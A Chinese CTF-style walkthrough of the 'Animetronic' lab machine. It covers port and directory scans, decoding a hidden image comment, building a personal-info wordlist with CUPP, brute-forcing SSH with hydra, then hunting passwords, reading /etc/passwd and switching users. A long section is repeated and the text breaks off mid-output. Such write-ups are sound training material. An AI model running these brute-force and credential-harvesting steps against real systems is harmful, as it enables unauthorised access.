![\"image-20240403151754014\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031947772.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV 172.20.10.5<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)\n|_ 256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\n|_http-title: Animetronic\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u7206\u7834<\/h3>\nferoxbuster -u http:\/\/172.20.10.5<\/code><\/pre>\n301 GET 9l 28w 307c http:\/\/172.20.10.5\/js => http:\/\/172.20.10.5\/js\/\n200 GET 52l 340w 24172c http:\/\/172.20.10.5\/img\/favicon.ico\n200 GET 42l 81w 781c http:\/\/172.20.10.5\/css\/animetronic.css\n200 GET 7l 1513w 144878c http:\/\/172.20.10.5\/css\/bootstrap.min.css\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/css => http:\/\/172.20.10.5\/css\/\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/img => http:\/\/172.20.10.5\/img\/\n200 GET 2761l 15370w 1300870c http:\/\/172.20.10.5\/img\/logo.png\n200 GET 52l 202w 2384c http:\/\/172.20.10.5\/<\/code><\/pre>\n\u4ee5\u9632\u4e07\u4e00\uff0c\u6362\u4e00\u4e2a\u5b57\u5178\u626b\u4e00\u4e0b\uff0c\u8fd9\u4e2a\u9ed8\u8ba4\u5b57\u5178\u6709\u7684\u65f6\u5019\u5f88\u5bb9\u6613\u6f0f\u6389\u4e1c\u897f\uff1a<\/p>\n
feroxbuster -u http:\/\/172.20.10.5\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n\u679c\u7136\uff0c\u6f0f\u6389\u4e1c\u897f\u4e86\u3002\u3002\u3002\u3002<\/p>\n
200 GET 7l 1513w 144878c http:\/\/172.20.10.5\/css\/bootstrap.min.css\n200 GET 52l 340w 24172c http:\/\/172.20.10.5\/img\/favicon.ico\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/css => http:\/\/172.20.10.5\/css\/\n301 GET 9l 28w 307c http:\/\/172.20.10.5\/js => http:\/\/172.20.10.5\/js\/\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/img => http:\/\/172.20.10.5\/img\/\n200 GET 2761l 15370w 1300870c http:\/\/172.20.10.5\/img\/logo.png\n200 GET 42l 81w 781c http:\/\/172.20.10.5\/css\/animetronic.css\n200 GET 52l 202w 2384c http:\/\/172.20.10.5\/\n301 GET 9l 28w 315c http:\/\/172.20.10.5\/staffpages => http:\/\/172.20.10.5\/staffpages\/\n200 GET 728l 3824w 287818c http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
![\"image-20240403152606719\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\nhttp:\/\/172.20.10.5\/staffpages\/<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n<\/div><\/p>\n\u597d\u5bb6\u4f19\uff0c\u73a9\u5177\u718a\uff0c\u662f\u4e00\u5f20\u56fe\u7247\uff0c\u8bf7\u6c42\u8fc7\u6765\u3002<\/p>\n
\u56fe\u7247\u9690\u5199<\/h3>\nwget http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Animetronic]\n\u2514\u2500$ steghide extract -sf new_employees \nEnter passphrase: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Animetronic]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt new_employees \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.74% (133.1 MB) \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u6709\u9690\u85cf\u4fe1\u606f\uff0c\u4f46\u662f\u6211\u4eec\u6ca1\u6709\u7206\u7834\u51fa\u6765\uff1a<\/p>\n
\u5c1d\u8bd5\u76f4\u63a5file\u4e00\u4e0b\uff1a<\/p>\n
file new_employees \nnew_employees: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "page for you michael : ya\/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=", progressive, precision 8, 703x1136, components 3<\/code><\/pre>\n\u627e\u5230\u9690\u85cf\u4fe1\u606f\uff0c\u5f88\u660e\u663e\u662fbase64\uff0c\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
echo 'ya\/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d\n\u026f\u01ddss\u0250\u0183\u01dd\u203e\u025fo\u0279\u203e\u026f\u0131\u0254\u0265\u0250\u01dd<\/code><\/pre>\n\u5012\u8fc7\u6765\u518d\u7ffb\u8f6c\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\nmessage_for_m1chae<\/code><\/pre>\n\u5c1d\u8bd5\u8bbf\u95ee\u53d1\u73b0\u9519\u8bef\uff0c\u66f4\u6539\u4e00\u4e0b\uff1a<\/p>\n
message_for_m1chae + page for you michael -> message_for_michael<\/code><\/pre>\nHi Michael\n\nSorry for this complicated way of sending messages between us.\nThis is because I assigned a powerful hacker to try to hack\nour server.\n\nBy the way, try changing your password because it is easy\nto discover, as it is a mixture of your personal information\ncontained in this file \n\npersonal_info.txt<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff1a<\/p>\n
name: Michael\nage: 27\nbirth date: 19\/10\/1996\nnumber of children: 3 " Ahmed - Yasser - Adam "\nHobbies: swimming <\/code><\/pre>\n\u751f\u6210\u793e\u5de5\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u5c1d\u8bd5\u4f7f\u7528cupp\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ python3 cupp.py -i\n ___________ \n cupp.py! # Common\n \\ # User\n \\ ,__, # Passwords\n \\ (oo)____ # Profiler\n (__) )\\ \n ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]\n [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don't know all the info, just hit enter when asked! ;)\n\n> First Name: Michael\n> Surname: \n> Nickname: \n> Birthdate (DDMMYYYY): 19101996 \n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child's name: Ahmed\n> Child's nickname: \n> Child's birthdate (DDMMYYYY): \n\n> Pet's name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: Y\n> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: 27 Yasser Adam swimming\n> Do you want to add special chars at the end of words? Y\/[N]: Y\n> Do you want to add some random numbers at the end of words? Y\/[N]:Y\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to michael.txt, counting 3984 words.\n> Hyperspeed Print? (Y\/n) : n\n[+] Now load your pistolero with michael.txt and shoot! Good luck!<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
hydra -l Michael -P michael.txt ssh:\/\/172.20.10.5<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ hydra -l michael -P michael.txt ssh:\/\/172.20.10.5 \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-03 06:50:13\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 3984 login tries (l:1\/p:3984), ~249 tries per task\n[DATA] attacking ssh:\/\/172.20.10.5:22\/\n[STATUS] 114.00 tries\/min, 114 tries in 00:01h, 3872 to do in 00:34h, 14 active\n[STATUS] 98.67 tries\/min, 296 tries in 00:03h, 3690 to do in 00:38h, 14 active\n[STATUS] 92.29 tries\/min, 646 tries in 00:07h, 3340 to do in 00:37h, 14 active\n[STATUS] 89.73 tries\/min, 1346 tries in 00:15h, 2640 to do in 00:30h, 14 active\n[STATUS] 86.68 tries\/min, 2687 tries in 00:31h, 1300 to do in 00:15h, 13 active\n[STATUS] 85.89 tries\/min, 3092 tries in 00:36h, 895 to do in 00:11h, 13 active\n[22][ssh] host: 172.20.10.5 login: michael password: leahcim1996\n1 of 1 target successfully completed, 1 valid password found\n[WARNING] Writing restore file because 3 final worker threads did not complete until end.\n[ERROR] 3 targets did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-03 07:30:22<\/code><\/pre>\n\u7206\u7834\u51fa\u6765\u4e86\u4e00\u4e2a\u5bc6\u7801\uff1a<\/p>\n
michael\nleahcim1996<\/code><\/pre>\nssh\u8fde\u63a5<\/h3>\nssh michael@172.20.10.5\nleahcim1996<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nmichael@animetronic:~$ whoami;id\nmichael\nuid=1001(michael) gid=1001(michael) groups=1001(michael)\nmichael@animetronic:~$ sudo -l\n[sudo] password for michael: \nSorry, user michael may not run sudo on animetronic.\nmichael@animetronic:\/home\/henry$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n\/usr\/bin\/chsh\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nmichael@animetronic:~$ pwd\n\/home\/michael\nmichael@animetronic:~$ ls -la\ntotal 28\ndrwxr-x--- 3 michael michael 4096 Nov 27 21:03 .\ndrwxr-xr-x 4 root root 4096 Nov 27 18:10 ..\n-rw------- 1 michael michael 5 Nov 27 21:03 .bash_history\n-rw-r--r-- 1 michael michael 220 Jan 6 2022 .bash_logout\n-rw-r--r-- 1 michael michael 3771 Jan 6 2022 .bashrc\ndrwx------ 2 michael michael 4096 Nov 27 18:50 .cache\n-rw-r--r-- 1 michael michael 807 Jan 6 2022 .profile\nmichael@animetronic:~$ cat .bash_history \nexit\nmichael@animetronic:~$ cd ..;ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 27 18:10 .\ndrwxr-xr-x 19 root root 4096 Nov 27 09:54 ..\ndrwxrwxr-x 6 henry henry 4096 Nov 27 20:59 henry\ndrwxr-x--- 3 michael michael 4096 Nov 27 21:03 michael\nmichael@animetronic:\/home$ cd henry\/\nmichael@animetronic:\/home\/henry$ ls -la\ntotal 56\ndrwxrwxr-x 6 henry henry 4096 Nov 27 20:59 .\ndrwxr-xr-x 4 root root 4096 Nov 27 18:10 ..\n-rwxrwxr-x 1 henry henry 30 Jan 5 10:08 .bash_history\n-rwxrwxr-x 1 henry henry 220 Jan 6 2022 .bash_logout\n-rwxrwxr-x 1 henry henry 3771 Jan 6 2022 .bashrc\ndrwxrwxr-x 2 henry henry 4096 Nov 27 10:08 .cache\ndrwxrwxr-x 3 henry henry 4096 Nov 27 10:42 .local\ndrwxrwxr-x 402 henry henry 12288 Nov 27 18:23 .new_folder\n-rwxrwxr-x 1 henry henry 807 Jan 6 2022 .profile\ndrwxrwxr-x 2 henry henry 4096 Nov 27 10:04 .ssh\n-rwxrwxr-x 1 henry henry 0 Nov 27 18:26 .sudo_as_admin_successful\n-rwxrwxr-x 1 henry henry 119 Nov 27 18:18 Note.txt\n-rwxrwxr-x 1 henry henry 33 Nov 27 18:20 user.txt\nmichael@animetronic:\/home\/henry$ cat user.txt \n0833990328464efff1de6cd93067cfb7\nmichael@animetronic:\/home\/henry$ cat Note.txt \nif you need my account to do anything on the server,\nyou will find my password in file named\n\naGVucnlwYXNzd29yZC50eHQK<\/code><\/pre>\n\u627e\u654f\u611f\u6587\u4ef6<\/h3>\nfind \/ -name aGVucnlwYXNzd29yZC50eHQK -type f 2>\/dev\/null<\/code><\/pre>\n\u6ca1\u6709\u53d1\u73b0\uff0c\u8fdb\u884cbase64\u89e3\u7801\uff1a<\/p>\n
echo "aGVucnlwYXNzd29yZC50eHQK" | base64 -d\nhenrypassword.txt\nfind \/ -name henrypassword.txt -type f 2>\/dev\/null\n\/home\/henry\/.new_folder\/dir289\/dir26\/dir10\/henrypassword.txt<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6587\u4ef6\u5185\u5bb9\uff1a<\/p>\n
IHateWilliam<\/code><\/pre>\n\u5207\u6362henry\u7528\u6237<\/h3>\n
\u5b83\u7684\u540d\u5b57\u663e\u793a\u8fd9\u662fhenry<\/code>\u7684\u5bc6\u7801\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\nmichael@animetronic:\/home\/henry$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nhenry:x:1000:1000:Hanry:\/home\/henry:\/bin\/bash\nmysql:x:108:113:MySQL Server,,,:\/nonexistent:\/bin\/false\nmichael:x:1001:1001::\/home\/michael:\/usr\/bin\/bas<\/code><\/pre>\n\u6709\u7684\uff0c\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n
michael@animetronic:\/home\/henry$ su henry\nPassword: \nhenry@animetronic:~$ whoami;id\nhenry\nuid=1000(henry) gid=1000(henry) groups=1000(henry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nhenry@animetronic:~$ sudo -l\nMatching Defaults entries for henry on animetronic:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser henry may run the following commands on animetronic:\n (root) NOPASSWD: \/usr\/bin\/socat<\/code><\/pre>\n
nmap -sCV 172.20.10.5<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)\n|_ 256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\n|_http-title: Animetronic\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u7206\u7834<\/h3>\nferoxbuster -u http:\/\/172.20.10.5<\/code><\/pre>\n301 GET 9l 28w 307c http:\/\/172.20.10.5\/js => http:\/\/172.20.10.5\/js\/\n200 GET 52l 340w 24172c http:\/\/172.20.10.5\/img\/favicon.ico\n200 GET 42l 81w 781c http:\/\/172.20.10.5\/css\/animetronic.css\n200 GET 7l 1513w 144878c http:\/\/172.20.10.5\/css\/bootstrap.min.css\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/css => http:\/\/172.20.10.5\/css\/\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/img => http:\/\/172.20.10.5\/img\/\n200 GET 2761l 15370w 1300870c http:\/\/172.20.10.5\/img\/logo.png\n200 GET 52l 202w 2384c http:\/\/172.20.10.5\/<\/code><\/pre>\n\u4ee5\u9632\u4e07\u4e00\uff0c\u6362\u4e00\u4e2a\u5b57\u5178\u626b\u4e00\u4e0b\uff0c\u8fd9\u4e2a\u9ed8\u8ba4\u5b57\u5178\u6709\u7684\u65f6\u5019\u5f88\u5bb9\u6613\u6f0f\u6389\u4e1c\u897f\uff1a<\/p>\n
feroxbuster -u http:\/\/172.20.10.5\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n\u679c\u7136\uff0c\u6f0f\u6389\u4e1c\u897f\u4e86\u3002\u3002\u3002\u3002<\/p>\n
200 GET 7l 1513w 144878c http:\/\/172.20.10.5\/css\/bootstrap.min.css\n200 GET 52l 340w 24172c http:\/\/172.20.10.5\/img\/favicon.ico\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/css => http:\/\/172.20.10.5\/css\/\n301 GET 9l 28w 307c http:\/\/172.20.10.5\/js => http:\/\/172.20.10.5\/js\/\n301 GET 9l 28w 308c http:\/\/172.20.10.5\/img => http:\/\/172.20.10.5\/img\/\n200 GET 2761l 15370w 1300870c http:\/\/172.20.10.5\/img\/logo.png\n200 GET 42l 81w 781c http:\/\/172.20.10.5\/css\/animetronic.css\n200 GET 52l 202w 2384c http:\/\/172.20.10.5\/\n301 GET 9l 28w 315c http:\/\/172.20.10.5\/staffpages => http:\/\/172.20.10.5\/staffpages\/\n200 GET 728l 3824w 287818c http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n\u6f0f\u6d1e\u6316\u6398<\/h2>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div>
\n<\/div><\/p>\nhttp:\/\/172.20.10.5\/staffpages\/<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n<\/div><\/p>\n\u597d\u5bb6\u4f19\uff0c\u73a9\u5177\u718a\uff0c\u662f\u4e00\u5f20\u56fe\u7247\uff0c\u8bf7\u6c42\u8fc7\u6765\u3002<\/p>\n
\u56fe\u7247\u9690\u5199<\/h3>\nwget http:\/\/172.20.10.5\/staffpages\/new_employees<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Animetronic]\n\u2514\u2500$ steghide extract -sf new_employees \nEnter passphrase: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Animetronic]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt new_employees \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.74% (133.1 MB) \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u6709\u9690\u85cf\u4fe1\u606f\uff0c\u4f46\u662f\u6211\u4eec\u6ca1\u6709\u7206\u7834\u51fa\u6765\uff1a<\/p>\n
\u5c1d\u8bd5\u76f4\u63a5file\u4e00\u4e0b\uff1a<\/p>\n
file new_employees \nnew_employees: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "page for you michael : ya\/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=", progressive, precision 8, 703x1136, components 3<\/code><\/pre>\n\u627e\u5230\u9690\u85cf\u4fe1\u606f\uff0c\u5f88\u660e\u663e\u662fbase64\uff0c\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
echo 'ya\/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d\n\u026f\u01ddss\u0250\u0183\u01dd\u203e\u025fo\u0279\u203e\u026f\u0131\u0254\u0265\u0250\u01dd<\/code><\/pre>\n\u5012\u8fc7\u6765\u518d\u7ffb\u8f6c\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\nmessage_for_m1chae<\/code><\/pre>\n\u5c1d\u8bd5\u8bbf\u95ee\u53d1\u73b0\u9519\u8bef\uff0c\u66f4\u6539\u4e00\u4e0b\uff1a<\/p>\n
message_for_m1chae + page for you michael -> message_for_michael<\/code><\/pre>\nHi Michael\n\nSorry for this complicated way of sending messages between us.\nThis is because I assigned a powerful hacker to try to hack\nour server.\n\nBy the way, try changing your password because it is easy\nto discover, as it is a mixture of your personal information\ncontained in this file \n\npersonal_info.txt<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff1a<\/p>\n
name: Michael\nage: 27\nbirth date: 19\/10\/1996\nnumber of children: 3 " Ahmed - Yasser - Adam "\nHobbies: swimming <\/code><\/pre>\n\u751f\u6210\u793e\u5de5\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff0c\u5c1d\u8bd5\u4f7f\u7528cupp\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ python3 cupp.py -i\n ___________ \n cupp.py! # Common\n \\ # User\n \\ ,__, # Passwords\n \\ (oo)____ # Profiler\n (__) )\\ \n ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]\n [ Mebus | https:\/\/github.com\/Mebus\/]\n\n[+] Insert the information about the victim to make a dictionary\n[+] If you don't know all the info, just hit enter when asked! ;)\n\n> First Name: Michael\n> Surname: \n> Nickname: \n> Birthdate (DDMMYYYY): 19101996 \n\n> Partners) name: \n> Partners) nickname: \n> Partners) birthdate (DDMMYYYY): \n\n> Child's name: Ahmed\n> Child's nickname: \n> Child's birthdate (DDMMYYYY): \n\n> Pet's name: \n> Company name: \n\n> Do you want to add some key words about the victim? Y\/[N]: Y\n> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: 27 Yasser Adam swimming\n> Do you want to add special chars at the end of words? Y\/[N]: Y\n> Do you want to add some random numbers at the end of words? Y\/[N]:Y\n> Leet mode? (i.e. leet = 1337) Y\/[N]: \n\n[+] Now making a dictionary...\n[+] Sorting list and removing duplicates...\n[+] Saving dictionary to michael.txt, counting 3984 words.\n> Hyperspeed Print? (Y\/n) : n\n[+] Now load your pistolero with michael.txt and shoot! Good luck!<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
hydra -l Michael -P michael.txt ssh:\/\/172.20.10.5<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/cupp]\n\u2514\u2500$ hydra -l michael -P michael.txt ssh:\/\/172.20.10.5 \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-03 06:50:13\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 3984 login tries (l:1\/p:3984), ~249 tries per task\n[DATA] attacking ssh:\/\/172.20.10.5:22\/\n[STATUS] 114.00 tries\/min, 114 tries in 00:01h, 3872 to do in 00:34h, 14 active\n[STATUS] 98.67 tries\/min, 296 tries in 00:03h, 3690 to do in 00:38h, 14 active\n[STATUS] 92.29 tries\/min, 646 tries in 00:07h, 3340 to do in 00:37h, 14 active\n[STATUS] 89.73 tries\/min, 1346 tries in 00:15h, 2640 to do in 00:30h, 14 active\n[STATUS] 86.68 tries\/min, 2687 tries in 00:31h, 1300 to do in 00:15h, 13 active\n[STATUS] 85.89 tries\/min, 3092 tries in 00:36h, 895 to do in 00:11h, 13 active\n[22][ssh] host: 172.20.10.5 login: michael password: leahcim1996\n1 of 1 target successfully completed, 1 valid password found\n[WARNING] Writing restore file because 3 final worker threads did not complete until end.\n[ERROR] 3 targets did not resolve or could not be connected\n[ERROR] 0 target did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-03 07:30:22<\/code><\/pre>\n\u7206\u7834\u51fa\u6765\u4e86\u4e00\u4e2a\u5bc6\u7801\uff1a<\/p>\n
michael\nleahcim1996<\/code><\/pre>\nssh\u8fde\u63a5<\/h3>\nssh michael@172.20.10.5\nleahcim1996<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nmichael@animetronic:~$ whoami;id\nmichael\nuid=1001(michael) gid=1001(michael) groups=1001(michael)\nmichael@animetronic:~$ sudo -l\n[sudo] password for michael: \nSorry, user michael may not run sudo on animetronic.\nmichael@animetronic:\/home\/henry$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n\/usr\/bin\/chsh\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nmichael@animetronic:~$ pwd\n\/home\/michael\nmichael@animetronic:~$ ls -la\ntotal 28\ndrwxr-x--- 3 michael michael 4096 Nov 27 21:03 .\ndrwxr-xr-x 4 root root 4096 Nov 27 18:10 ..\n-rw------- 1 michael michael 5 Nov 27 21:03 .bash_history\n-rw-r--r-- 1 michael michael 220 Jan 6 2022 .bash_logout\n-rw-r--r-- 1 michael michael 3771 Jan 6 2022 .bashrc\ndrwx------ 2 michael michael 4096 Nov 27 18:50 .cache\n-rw-r--r-- 1 michael michael 807 Jan 6 2022 .profile\nmichael@animetronic:~$ cat .bash_history \nexit\nmichael@animetronic:~$ cd ..;ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 27 18:10 .\ndrwxr-xr-x 19 root root 4096 Nov 27 09:54 ..\ndrwxrwxr-x 6 henry henry 4096 Nov 27 20:59 henry\ndrwxr-x--- 3 michael michael 4096 Nov 27 21:03 michael\nmichael@animetronic:\/home$ cd henry\/\nmichael@animetronic:\/home\/henry$ ls -la\ntotal 56\ndrwxrwxr-x 6 henry henry 4096 Nov 27 20:59 .\ndrwxr-xr-x 4 root root 4096 Nov 27 18:10 